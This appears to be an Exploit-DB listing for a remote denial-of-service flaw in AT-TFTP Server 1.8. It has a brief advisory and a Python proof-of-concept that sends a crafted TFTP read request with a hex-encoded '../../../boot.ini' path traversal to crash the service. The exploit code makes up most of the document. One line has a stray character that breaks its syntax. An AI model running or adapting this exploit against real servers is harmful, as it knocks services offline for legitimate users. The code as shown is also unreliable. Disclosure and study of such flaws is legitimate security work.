AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service

EDB-ID:

35654

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2011-04-25


source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable. 

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference : 
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

addr = (host,port)1

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))